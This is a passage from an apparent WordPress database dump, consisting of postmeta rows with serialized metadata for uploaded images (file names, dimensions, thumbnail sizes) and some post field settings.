1:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2344,743,'footnotes',''),
(2345,743,'title_style','default'),
(2346,743,'_title_style','field_5d1a0217cf408'),
(2347,744,'footnotes',''),
(2348,744,'title_style','default'),
(2349,744,'_title_style','field_5d1a0217cf408'),
(2350,745,'footnotes',''),
(2351,745,'title_style','default'),
(2352,745,'_title_style','field_5d1a0217cf408'),
(2353,746,'footnotes',''),
(2354,746,'title_style','default'),
(2355,746,'_title_style','field_5d1a0217cf408'),
(2356,747,'footnotes',''),
(2357,747,'title_style','default'),
(2358,747,'_title_style','field_5d1a0217cf408'),
(2361,751,'_edit_lock','1763009440:1'),
(2362,752,'_wp_attached_file','2025/11/572095115_122254848554202781_886880693938319365_n.jpg'),
(2363,752,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1076;s:4:\"file\";s:61:\"2025/11/572095115_122254848554202781_886880693938319365_n.jpg\";s:8:\"filesize\";i:273917;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"572095115_122254848554202781_886880693938319365_n-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17941;}s:5:\"large\";a:5:{s:4:\"file\";s:62:\"572095115_122254848554202781_886880693938319365_n-1024x538.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122577;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"572095115_122254848554202781_886880693938319365_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10072;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:61:\"572095115_122254848554202781_886880693938319365_n-768x404.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:404;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77742;}s:15:\"tbms-custom-300\";a:5:{s:4:\"file\";s:61:\"572095115_122254848554202781_886880693938319365_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29469;}s:15:\"tbms-custom-500\";a:5:{s:4:\"file\";s:61:\"572095115_122254848554202781_886880693938319365_n-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61540;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"572095115_122254848554202781_886880693938319365_n-1536x807.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:807;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:216693;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:61:\"572095115_122254848554202781_886880693938319365_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24531;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2366,751,'_thumbnail_id','752'),
(2367,751,'_edit_last','1'),
(2370,751,'title_style','default'),
(2371,751,'_title_style','field_5d1a0217cf408'),
(2372,753,'title_style','default'),
(2373,753,'_title_style','field_5d1a0217cf408'),
(2376,751,'related',''),
(2377,751,'_related','field_603b51c3e183e'),
(2378,753,'related',''),
(2379,753,'_related','field_603b51c3e183e'),
(2382,754,'_wp_attached_file','2025/11/560432794_122252459414202781_8219191812793928684_n.jpg'),
(2383,754,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/11/560432794_122252459414202781_8219191812793928684_n.jpg\";s:8:\"filesize\";i:290463;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"560432794_122252459414202781_8219191812793928684_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20787;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"560432794_122252459414202781_8219191812793928684_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:134507;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"560432794_122252459414202781_8219191812793928684_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9242;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"560432794_122252459414202781_8219191812793928684_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85858;}s:15:\"tbms-custom-300\";a:5:{s:4:\"file\";s:62:\"560432794_122252459414202781_8219191812793928684_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27691;}s:15:\"tbms-custom-500\";a:5:{s:4:\"file\";s:62:\"560432794_122252459414202781_8219191812793928684_n-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60100;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"560432794_122252459414202781_8219191812793928684_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:236510;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"560432794_122252459414202781_8219191812793928684_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21674;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2384,755,'footnotes',''),
(2385,755,'title_style','default'),
(2386,755,'_title_style','field_5d1a0217cf408'),
(2388,757,'_wp_attached_file','2025/11/572095115_122254848554202781_886880693938319365_n-1.jpg'),
(2389,757,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1076;s:4:\"file\";s:63:\"2025/11/572095115_122254848554202781_886880693938319365_n-1.jpg\";s:8:\"filesize\";i:273917;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:63:\"572095115_122254848554202781_886880693938319365_n-1-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17941;}s:5:\"large\";a:5:{s:4:\"file\";s:64:\"572095115_122254848554202781_886880693938319365_n-1-1024x538.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122577;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:63:\"572095115_122254848554202781_886880693938319365_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10072;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"572095115_122254848554202781_886880693938319365_n-1-768x404.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:404;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77742;}s:15:\"tbms-custom-300\";a:5:{s:4:\"file\";s:63:\"572095115_122254848554202781_886880693938319365_n-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29469;}s:15:\"tbms-custom-500\";a:5:{s:4:\"file\";s:63:\"572095115_122254848554202781_886880693938319365_n-1-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61540;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"572095115_122254848554202781_886880693938319365_n-1-1536x807.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:807;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:216693;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:63:\"572095115_122254848554202781_886880693938319365_n-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24531;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2390,758,'footnotes',''),
(2391,758,'title_style','default'),
(2392,758,'_title_style','field_5d1a0217cf408'),
(2393,759,'footnotes',''),
(2394,759,'title_style','default'),
(2395,759,'_title_style','field_5d1a0217cf408'),
(2396,760,'footnotes',''),
(2397,761,'_wp_attached_file','2025/11/582270586_122256729548202781_1342293203871796833_n.jpg'),
(2398,761,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2021;s:6:\"height\";i:748;s:4:\"file\";s:62:\"2025/11/582270586_122256729548202781_1342293203871796833_n.jpg\";s:8:\"filesize\";i:185270;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"582270586_122256729548202781_1342293203871796833_n-300x111.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12013;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"582270586_122256729548202781_1342293203871796833_n-1024x379.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:379;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89465;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"582270586_122256729548202781_1342293203871796833_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9258;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"582270586_122256729548202781_1342293203871796833_n-768x284.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56807;}s:15:\"tbms-custom-300\";a:5:{s:4:\"file\";s:62:\"582270586_122256729548202781_1342293203871796833_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27278;}s:15:\"tbms-custom-500\";a:5:{s:4:\"file\";s:62:\"582270586_122256729548202781_1342293203871796833_n-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58917;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:63:\"582270586_122256729548202781_1342293203871796833_n-1536x568.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:568;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:165202;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"582270586_122256729548202781_1342293203871796833_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22472;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2418,768,'_wp_attached_file','2025/11/582270586_122256729548202781_1342293203871796833_n-1.jpg'),
(2419,768,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2021;s:6:\"height\";i:748;s:4:\"file\";s:64:\"2025/11/582270586_122256729548202781_1342293203871796833_n-1.jpg\";s:8:\"filesize\";i:185270;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"582270586_122256729548202781_1342293203871796833_n-1-300x111.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12013;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"582270586_122256729548202781_1342293203871796833_n-1-1024x379.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:379;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89465;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"582270586_122256729548202781_1342293203871796833_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9258;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"582270586_122256729548202781_1342293203871796833_n-1-768x284.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56807;}s:15:\"tbms-custom-300\";a:5:{s:4:\"file\";s:64:\"582270586_122256729548202781_1342293203871796833_n-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27278;}s:15:\"tbms-custom-500\";a:5:{s:4:\"file\";s:64:\"582270586_122256729548202781_1342293203871796833_n-1-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58917;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:65:\"582270586_122256729548202781_1342293203871796833_n-1-1536x568.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:568;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:165202;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"582270586_122256729548202781_1342293203871796833_n-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22472;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2424,771,'_wp_attached_file','2025/11/1.jpg'),
(2425,771,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:13:\"2025/11/1.jpg\";s:8:\"filesize\";i:237212;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:13:\"1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13047;}s:5:\"large\";a:5:{s:4:\"file\";s:14:\"1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90471;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6882;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:13:\"1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58826;}s:15:\"tbms-custom-300\";a:5:{s:4:\"file\";s:13:\"1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21247;}s:15:\"tbms-custom-500\";a:5:{s:4:\"file\";s:13:\"1-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46918;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:14:\"1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:165143;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:13:\"1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17600;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2430,773,'_wp_attached_file','2025/11/582270586_122256729548202781_1342293203871796833_n-2.jpg'),
(2431,773,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2021;s:6:\"height\";i:748;s:4:\"file\";s:64:\"2025/11/582270586_122256729548202781_1342293203871796833_n-2.jpg\";s:8:\"filesize\";i:185270;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"582270586_122256729548202781_1342293203871796833_n-2-300x111.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12013;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"582270586_122256729548202781_1342293203871796833_n-2-1024x379.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:379;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89465;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"582270586_122256729548202781_1342293203871796833_n-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9258;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"582270586_122256729548202781_1342293203871796833_n-2-768x284.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56807;}s:15:\"tbms-custom-300\";a:5:{s:4:\"file\";s:64:\"582270586_122256729548202781_1342293203871796833_n-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27278;}s:15:\"tbms-custom-500\";a:5:{s:4:\"file\";s:64:\"582270586_122256729548202781_1342293203871796833_n-2-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58917;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:65:\"582270586_122256729548202781_1342293203871796833_n-2-1536x568.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:568;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:165202;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"582270586_122256729548202781_1342293203871796833_n-2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22472;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2439,776,'_edit_lock','1774585704:1'),
(2440,777,'_wp_attached_file','2026/03/ilovepdf_merged_page-0001.jpg'),
(2441,777,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1755;s:6:\"height\";i:1240;s:4:\"file\";s:37:\"2026/03/ilovepdf_merged_page-0001.jpg\";s:8:\"filesize\";i:497148;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0001-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10424;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"ilovepdf_merged_page-0001-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72077;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0001-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5741;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0001-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47650;}s:15:\"tbms-custom-300\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0001-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16630;}s:15:\"tbms-custom-500\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0001-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37880;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"ilovepdf_merged_page-0001-1536x1085.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125949;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0001-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11674;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2442,778,'_wp_attached_file','2026/03/ilovepdf_merged_page-0002.jpg'),
(2443,778,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1755;s:6:\"height\";i:1240;s:4:\"file\";s:37:\"2026/03/ilovepdf_merged_page-0002.jpg\";s:8:\"filesize\";i:1046650;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0002-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18806;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"ilovepdf_merged_page-0002-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130069;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0002-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8288;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0002-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86359;}s:15:\"tbms-custom-300\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0002-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26555;}s:15:\"tbms-custom-500\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0002-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61059;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"ilovepdf_merged_page-0002-1536x1085.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:229314;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0002-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20453;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2444,779,'_wp_attached_file','2026/03/ilovepdf_merged_page-0003.jpg'),
(2445,779,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1755;s:6:\"height\";i:1240;s:4:\"file\";s:37:\"2026/03/ilovepdf_merged_page-0003.jpg\";s:8:\"filesize\";i:551736;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0003-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14126;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"ilovepdf_merged_page-0003-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91210;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0003-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7102;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0003-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60143;}s:15:\"tbms-custom-300\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0003-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21052;}s:15:\"tbms-custom-500\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0003-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45909;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"ilovepdf_merged_page-0003-1536x1085.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:157615;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s